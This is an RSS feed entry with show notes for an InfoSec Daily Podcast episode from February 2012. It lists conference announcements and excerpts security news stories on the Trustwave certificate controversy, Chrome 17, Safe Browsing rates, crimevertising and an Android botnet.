		<title>Episode 594 &#8211; SOCA, (Dis)TrustWave, Safe Browsing API, Better Chrome, Crimeversting, and Androidbmaster</title>
		<link>http://www.isdpodcast.com/episode-594-soca-distrustwave-safe-browsing-api-better-chrome-crimeversting-and-androidbmaster</link>
		<comments>http://www.isdpodcast.com/episode-594-soca-distrustwave-safe-browsing-api-better-chrome-crimeversting-and-androidbmaster#comments</comments>
		<pubDate>Wed, 15 Feb 2012 01:48:49 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3507</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 594 for February 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Themson Mester. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 594 for February 14, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Themson Mester.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/database-security/167901020/security/attacks-breaches/232600423/law-enforcement-ups-its-game-in-cybercrime.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/database-security/167901020/security/attacks-breaches/232600423/law-enforcement-ups-its-game-in-cybercrime.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It may still be a frantic game of catch-up for law enforcement, but new data quantifies anecdotal evidence that law enforcement has scored some big cybercrime busts and made inroads in detecting and investigating data breaches.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Law enforcement officials worldwide detected five times as many breaches in 2011 as in 2010, according to new data released today in Trustwave&#39;s 2012 Global Security Report: Some 33 percent of organizations with data breaches were alerted to their fate by law enforcement, up from 7 percent in 2010. According to Trustwave, that is mostly due to work by the U.S. Secret Service, Interpol, the Australian Federal Police, and the U.K.&#39;s Serious Organised Crime Agency (SOCA).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Law enforcement agencies have really stepped it up from a data-notification standpoint. They are apprehending criminals in possession of [stolen] data and doing a better analysis of what&#39;s happening,&quot; says Nicholas Percoco, senior vice president and head of Trustwave SpiderLabs, which based its data on more than 300 data breach investigations and 2,000 penetration tests performed by SpiderLabs worldwide in 2011.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;&nbsp;</span><a href="http://www.computerworld.com/s/article/9224082/%0bTrustwave_admits_issuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9224082/</span></a><br />
	<a href="http://www.computerworld.com/s/article/9224082/%0bTrustwave_admits_issuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Trustwave_admits_issuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment</span></a><br />
	<a href="http://www.computerworld.com/s/article/9224082/%0bTrustwave_admits_issuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Digital Certificate Authority (CA) Trustwave revealed that it has issued a digital certificate that enabled an unnamed private company to spy on SSL-protected connections within its corporate network, an action that prompted the Mozilla community to debate whether the CA&#39;s root certificate should be removed from Firefox.</span></a></p>
<p>	<a href="http://www.computerworld.com/s/article/9224082/%0bTrustwave_admits_issuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The certificate issued by Trustwave is known as a subordinate root and enabled its owner to sign digital certificates for virtually any domain on the Internet. The certificate was to be used within a private network within a data loss prevention system, Trustwave said in</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a blog post on Saturday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The CA took steps to ensure that the subordinate root could not be stolen or abused. The certificate was stored in a Hardware Security Module, a device built specifically for the management of digital keys, which ensured that its extraction was impossible, Trustwave said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company also performed on-site physical security audits to make sure that the system can&#39;t be removed from the premises and used to intercept SSL-encrypted (Secure Sockets Layer-encrypted) traffic on another network.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We did not create a system where the customer could generate ad-hoc SSL certificates AND extract the private keys to be used outside this device,&quot; said Brian Trzupek, Trustwave&#39;s vice president for managed identity and authentication, in a discussion on Mozilla&#39;s bug tracker on Tuesday. &quot;Nor could the subordinate root key ever get exported from the device.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mozilla&#39;s community is currently debating whether the issuing of such certificates represents a breach of the software vendor&#39;s CA Certificate Policy, regardless of what security measures were put in place. CAs adhere to this Policy in order to have their root certificates trusted by Mozilla&#39;s products.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We reserve the right to not include a particular CA certificate in our software products. This includes (but is not limited to) cases where we believe that including a CA certificate (or setting its &quot;trust bits&quot; in a particular way) would cause undue risks to users&#39; security, for example, with CAs that knowingly issue certificates without the knowledge of the entities whose information is referenced in the certificates,&quot; Mozilla&#39;s CA Certificate Policy states.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.csoonline.com/article/699645/something-fishy-about-google-chrome-s-safe-browsing-api-lab-says-"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.csoonline.com/article/699645/something-fishy-about-google-chrome-s-safe-browsing-api-lab-says-</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From the start, Google&#39;s Safe Browsing API was designed to spot malicious web pages so users wouldn&#39;t get trapped in them. Google identifies these sites through its own algorithms and user notification.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google Chrome isn&#39;t the only browser to do this. FireFox and Safari rely on the lists made available in the Safe Browsing API, and Microsoft has its Application Reputation with Internet Explorer, which essentially does the same thing.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This week, NSS Labs, a firm that specializes in the testing of security systems, found something in its monitoring that just didn&#39;t feel right.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to NSS Labs, during the most recent period of testing, Nov. 21, 2011 through Jan. 5, 2011, they observed what appears to be a significant change in malicious website protection when contrasted with historical data. According to their report, &quot;Did Google Pull a Fast One on Firefox and Safari Users?&quot;, Chrome&#39;s protection rate rose to more than 50 percent before falling back down to 20 percent, while at the same time the Firefox and Safari block rate remained stuck at 2 percent and then suddenly jumped to 7 percent on the same day Chrome&#39;s protection precipitously dropped.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The types of attacks NSS Labs evaluated during this period are what it calls &quot;socially engineered malware,&quot; or malware that is downloaded by the user from the web. The lab will be testing so-called drive-by download attacks in a later report.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;&nbsp;</span><a href="http://www.computerworld.com/s/article/9224085/Google_ships_Chrome_17_touts_more_malware_alerts_and_page_preloads"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9224085/Google_ships_Chrome_17_touts_more_malware_alerts_and_page_preloads</span></a></p>
<p>	<a href="http://www.computerworld.com/s/article/9224085/Google_ships_Chrome_17_touts_more_malware_alerts_and_page_preloads"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google today patched 20 vulnerabilities in the desktop edition of Chrome and added new anti-malware download warnings to version 17.</span></a></p>
<p>	<a href="http://www.computerworld.com/s/article/9224085/Google_ships_Chrome_17_touts_more_malware_alerts_and_page_preloads"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company called out a pair of new features in Chrome 17, including the expansion of anti-malware download warnings and prerendering of pages suggested by the address/search bar&#39;s auto-complete function.</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google last refreshed Chrome eight weeks ago, on Dec. 13. Google generates an update to its &quot;stable&quot; channel about every six to eight weeks, a slightly more flexible schedule than rival Mozilla&#39;s every-six-weeks pace.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the 20 vulnerabilities patched today was rated &quot;critical,&quot; the most dire ranking in Google&#39;s threat system. Eight were marked &quot;high,&quot; while five were labeled &quot;medium&quot; and six were tagged &quot;low.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google paid $10,500 in bounties to four researchers for reporting 11 bugs, and another $3,133 to one of the four who uncovered a serious flaw that was quashed by developers before Chrome 17 made it to today&#39;s release. The nine other vulnerabilities were uncovered by members of Google&#39;s own security team, which includes developers who contribute to the open-source Chromium project &#8212; which feeds code to Chrome &#8212; or those who, for one reason or other, were not bonus-eligible.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Per its usual practice, Google blocked access to its bug tracking database for all 20 vulnerabilities to prevent outsiders from obtaining details that could be used to build exploits. Google typically opens up the database weeks or even months later, after it&#39;s sure a majority of users have migrated to the new edition.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google typically includes a handful of obvious changes in each Chrome upgrade, and it stayed with that practice today: The two features visible to users were an extension of Chrome&#39;s long-running anti-malware download warnings and faster displaying of some Web pages.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new download warnings alert users when they try to retrieve executable Windows files &#8212; including those with the &quot;.exe&quot; and &quot;.msi&quot; extensions &#8212; that Google knows or suspects are malicious, or are hosted on a website that commonly distributes threats.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://krebsonsecurity.com/2012/02/crimevertising-selling-into-the-malware-channel/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://krebsonsecurity.com/2012/02/crimevertising-selling-into-the-malware-channel/</span></a><br />
	<a href="http://krebsonsecurity.com/2012/02/crimevertising-selling-into-the-malware-channel/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anyone who&rsquo;s run a Web site is probably familiar with the term &ldquo;malvertising,&rdquo; which occurs when crooks hide exploits and malware inside of legitimate-looking ads that are submitted to major online advertising networks. But there&rsquo;s a relatively new form of malware-based advertising that&rsquo;s gaining ground &mdash; otherwise harmless ads for illicit services that are embedded inside the malware itself.</span></a></p>
<p>	<a href="http://krebsonsecurity.com/2012/02/crimevertising-selling-into-the-malware-channel/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At its most basic, this form of advertising &mdash; which I&rsquo;m calling &ldquo;crimevertising&rdquo; for want of a better term &mdash; has been around for many years. Most often it takes the form of banner ads on underground forums that hawk everything from</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> cybercriminal employment opportunities to banking Trojans and crooked cashout services. More recently, malware authors have started offering the ability to place paid ads in the Web-based administrative panels that customers use to control their botnets. Such placements afford advertisers an unprecedented opportunity to keep their brand name in front of the eyeballs of their target audience for hours on end.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;&nbsp;</span><a href="http://www.symantec.com/connect/blogs/androidbmaster-million-dollar-mobile-botnet"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.symantec.com/connect/blogs/androidbmaster-million-dollar-mobile-botnet</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We recently came across a new piece of Android malware, first highlighted by NC State&rsquo;s Xuxian Jiang, and began investigating the command-and-control (C&amp;C) servers associated with the threat. The malware was discovered on a third party marketplace (not the Android Market) and is bundled with a legitimate application for configuring phone settings. Trojanized applications are a well known infection vector for Android malware, as they allow malware to be distributed while retaining the appearance of a legitimate application.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Analysis of these servers indicate the total number of infected devices connected to the botnet over its entire life span numbered in the hundreds of thousands. The number of infected devices able to generate revenue on any given day ranged from 10,000 to 30,000, enough to potentially net the botmaster millions of dollars annually if infection rates are sustained. Profit estimations can be found in the &quot;Revenue generation&quot; section below. So far, the botmaster has been operating at these rates since September 2011. The botnet targets mobile users in China (the Trojanized application is only available for download from third-party Chinese markets). Revenue generation through premium SMS, telephony, and video services is also limited to the networks of China&#39;s two largest mobile carriers. Since the botnet has been active for a considerable amount of time, the botmaster has already earned hundreds of thousands of potential dollars during its operation. Also, while this is not the first botnet of this type we have found, this is the first time we are revealing detailed information regarding profitable revenue generation.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-594-soca-distrustwave-safe-browsing-api-better-chrome-crimeversting-and-androidbmaster/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3507/0/infosec-daily-podcast-episode-594.mp3" length="17783623" type="audio/mpeg" />
		<itunes:duration>0:37:00</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 594 for February 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka t[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 594 for February 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
